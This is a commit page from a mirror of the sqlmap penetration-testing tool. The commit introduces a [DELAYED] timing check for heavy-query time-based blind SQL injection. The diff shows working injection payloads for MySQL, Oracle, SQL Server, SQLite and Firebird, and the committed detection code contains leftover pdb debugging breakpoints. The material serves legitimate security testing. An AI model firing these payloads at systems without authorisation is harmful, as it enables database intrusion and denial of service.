sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

introducing [DELAYED] for heavy query time based payloads when response time is non-deterministic

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-07 00:27:26 +00:00
parent 32f1909131
commit 61f82fd274
4 changed files with 40 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
lib/controller/checks.py
View File

@ -45,6 +45,8 @@ from lib.core.exception import sqlmapSiteTooDynamic
from lib.core.exception import sqlmapUserQuitException
from lib.core.session import setString
from lib.core.session import setRegexp
from lib.core.settings import TIME_MIN_DELTA
from lib.core.settings import TIME_N_RESPONSE
from lib.request.connect import Connect as Request
from plugins.dbms.firebird.syntax import Syntax as Firebird
from plugins.dbms.postgresql.syntax import Syntax as PostgreSQL
@ -351,11 +353,23 @@ def checkSqlInjection(place, parameter, value):
_ = Request.queryPage(reqPayload, place)
duration = calculateDeltaSeconds(start)
if duration >= conf.timeSec:
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
logger.info(infoMsg)
if check.isdigit():
if duration >= int(check):
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
logger.info(infoMsg)
injectable = True
injectable = True
elif check == "[DELAYED]":
if duration >= max(TIME_MIN_DELTA, TIME_N_RESPONSE * kb.responseTime):
import pdb
pdb.set_trace()
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
logger.info(infoMsg)
injectable = True
else:
import pdb
pdb.set_trace()
# Restore old value of socket timeout
socket.setdefaulttimeout(popValue())

2
lib/core/common.py
View File

@ -1281,7 +1281,7 @@ def calculateDeltaSeconds(start, epsilon=0.1):
Returns elapsed time from start till now (including expected
error set by epsilon parameter)
"""
return int(time.time() - start - kb.responseTime + epsilon)
return time.time() - start - kb.responseTime + epsilon
def initCommonOutputs():
kb.commonOutputs = {}

5
lib/core/settings.py
View File

@ -48,6 +48,11 @@ DUMP_STOP_MARKER = "__STOP__"
PAYLOAD_DELIMITER = "\x00"
# settings used for delayed time payloads
TIME_MIN_DELTA = 1 # minimum difference of loading time in seconds
TIME_N_RESPONSE = 3 # minimum multiplicant of response time
# System variables
IS_WIN = subprocess.mswindows
# The name of the operating system dependent module imported. The following

50
xml/payloads.xml
View File

@ -1232,7 +1232,7 @@ Formats:
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
@ -1271,7 +1271,7 @@ Formats:
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
@ -1388,7 +1388,7 @@ Formats:
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>SQLite</dbms>
@ -1408,7 +1408,7 @@ Formats:
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Firebird</dbms>
@ -1452,7 +1452,7 @@ Formats:
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
@ -1484,29 +1484,11 @@ Formats:
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<request>
<payload>AND (SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM DUAL)>0</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<request>
<payload>AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Oracle</dbms>
@ -1524,7 +1506,7 @@ Formats:
<payload>AND (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
@ -1532,7 +1514,7 @@ Formats:
</test>
<test>
<title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title>
<title>SQLite &gt; 2.0 AND time-based blind</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
@ -1543,7 +1525,7 @@ Formats:
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>SQLite</dbms>
@ -1563,7 +1545,7 @@ Formats:
<payload>AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Firebird</dbms>
@ -1611,7 +1593,7 @@ Formats:
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
@ -1647,7 +1629,7 @@ Formats:
<payload>OR (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Oracle</dbms>
@ -1665,7 +1647,7 @@ Formats:
<payload>OR (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
@ -1673,7 +1655,7 @@ Formats:
</test>
<test>
<title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title>
<title>SQLite &gt; 2.0 OR time-based blind</title>
<stype>5</stype>
<level>4</level>
<risk>3</risk>
@ -1684,7 +1666,7 @@ Formats:
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>SQLite</dbms>
@ -1704,7 +1686,7 @@ Formats:
<payload>OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Firebird</dbms>